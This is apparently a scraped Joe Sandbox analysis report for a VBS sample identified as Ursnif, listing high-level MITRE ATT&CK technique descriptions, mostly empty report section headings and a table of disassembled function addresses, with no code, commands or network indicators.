Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report v8MaHZpVOY2L.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

User Modules

Hook Summary

Function 04444CEA, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Function 702E1E74, Relevance: 13.6, APIs: 9, Instructions: 107
sleepnativesynchronizationCOMMON

Function 702E1983, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 04444BDF, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Function 044425E5, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 70322400, Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 748
COMMONLIBRARYCODE

Function 04446244, Relevance: 7.5, APIs: 5, Instructions: 41
processCOMMON

Function 702E12CE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 702E1D62, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 702E192C, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 04446F19, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220
memorystringCOMMON

Function 04447662, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Function 70300E80, Relevance: 13.8, APIs: 9, Instructions: 326
COMMONLIBRARYCODE

Function 04441000, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 044462DD, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Function 044435A2, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre